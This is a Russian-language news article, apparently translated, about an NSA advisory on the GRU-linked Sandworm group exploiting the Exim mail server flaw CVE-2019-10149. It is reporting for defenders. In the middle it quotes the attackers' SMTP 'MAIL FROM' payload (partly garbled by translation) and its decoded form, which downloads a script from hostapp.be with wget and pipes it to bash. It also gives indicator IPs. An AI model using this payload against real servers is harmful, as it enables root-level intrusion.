Top.Mail.Ru
Уважаемый пользователь Game2Day!

Мы обнаружили, что вы используете систему удаления рекламы (Adblock, AdGuard или какую-то другую).

Реклама – наш единственный источник дохода и она позволяет нам каждый день готовить актуальные и крутые материалы.

Чтобы наш проект жил и развивался, просим вас отключить блокировку рекламы на нашем сайте. Ну а мы обещаем не делать ее надоедливой.

Американские спецслужбы обвинили хакеров ГРУ в атаках на серверы правительства США и их союзников

Российская хакерская группа, связанная с сетевыми атаками в Украине, использует уязвимость, которая позволяет ей контролировать компьютеры, управляемые правительством США и его партнерами.

В сообщении, опубликованном в четверг, Агентство национальной безопасности США заявило, что группа Sandworm активно использует уязвимость в Exim, агенте пересылки почты с открытым исходным кодом, или MTA, для операционных систем на основе Unix. Отслеживаемая как CVE-2019-10149, эта критическая ошибка позволяет злоумышленнику, не прошедшему проверку подлинности, отправлять специально созданные сообщения электронной почты, которые выполняют команды с привилегиями root. При этом злоумышленник может устанавливать программы по своему выбору, изменять данные и создавать новые учетные записи.

Патч CVE-2019-10149 доступен с июня прошлого года. Атаки были активны, по крайней мере, с августа. Представители АНБ написали:

Хакеры эксплуатировали жертв, используя программное обеспечение Exim на открытых MTA, отправляя команду в поле «MAIL FROM» сообщения SMTP (Simple Mail Transfer Protocol). Ниже приведен пример, который содержит параметры, которые субъект будет изменять при развертывании.

MAILFROM: <$ {запустить {\ x2Fbin \ x2Fsh \ дц \ т \ x22exec \ x20 \ x2Fusr \ x2Fbin \ x2Fwget \ x20 \ x2DO \ x20 \ х2д \ x20http \: \ x2F \ x2F \ hostapp.be \ x2Fscript1.sh \ x20 \ x7C \ x20bash \ x22}} @ hostapp.be>

Шестнадцатеричная декодированная команда:

/ bin / sh -c "exec / usr / bin / wget -O - http://hostapp.be/script1.sh | bash

Когда CVE-2019-10149 успешно используется, хакер может выполнить код по своему выбору. Когда Sandworm использовал CVE-2019-10149, компьютер-жертва впоследствии загружал и выполнял сценарий оболочки из домена, управляемого Sandworm. Этот сценарий будет пытаться сделать следующее на компьютере-жертве: добавить привилегированных пользователей, отключить параметры безопасности сети, обновить конфигурации SSH, чтобы разрешить дополнительный удаленный доступ, выполнить дополнительный сценарий, чтобы включить последующую эксплуатацию.

В четверг в сообщении говорилось, что хакеры работали на конкретное подразделение, известное как Главный центр специальных технологий, который находится в составе ГРУ или Главного разведывательного управления России. Среди исследователей безопасности существует общее согласие, что хакерская группа, работающая от имени этого подразделения, была ответственна за некоторые из самых амбициозных и разрушительных кибератак в последние годы.

Например, взломы в 2015 и 2016 годах, вызвавшие перебои с подачей электроэнергии в Украине. Выпуск NotPetya, червя для очистки данных, который распространился по всему миру за считанные часы и принес правительствам и бизнесу ущерб в десятки миллиардов долларов. Атака вредоносного ПО в начале 2018 года, которая закрыла ключевые части зимних Олимпийских игр.

Журналист Энди Гринберг недавно опубликовал книгу Sandworm, в которой рассказывается о взломах и геополитической напряженности, которую они используют.

Ошибка почтового сервера Exim обнаружилась в июне прошлого года , когда разработчики опубликовали исправление безопасности. В сообщении говорится, что для удаленных атак обычно требуется, чтобы уязвимые системы больше не работали с настройками по умолчанию. В одном случае, однако, были возможны удаленные атаки на системы по умолчанию, когда злоумышленник оставлял соединение с уязвимым сервером открытым в течение семи дней, передавая один байт каждые несколько минут.

В сообщении спецслужб США не говорится, сколько серверов пострадало, географию или отрасли, в которых они находятся. Несмотря на это, АНБ обычно не выдает подобные предупреждения, если нет причин для беспокойства.

Лица, ответственные за серверы Exim, должны проверить, что они работают под управлением версии 4.92 или выше. Кроме того, администраторы должны также проверять системные журналы на наличие соединений с 95.216.13.196, 103.94.157.5 и hostapp.be, которые связаны с деятельностью Sandworm.

Поделиться

Вы не авторизованы

Войдите, чтобы оставить комментарий!


Еще не зарегистрированы? Регистрация здесь.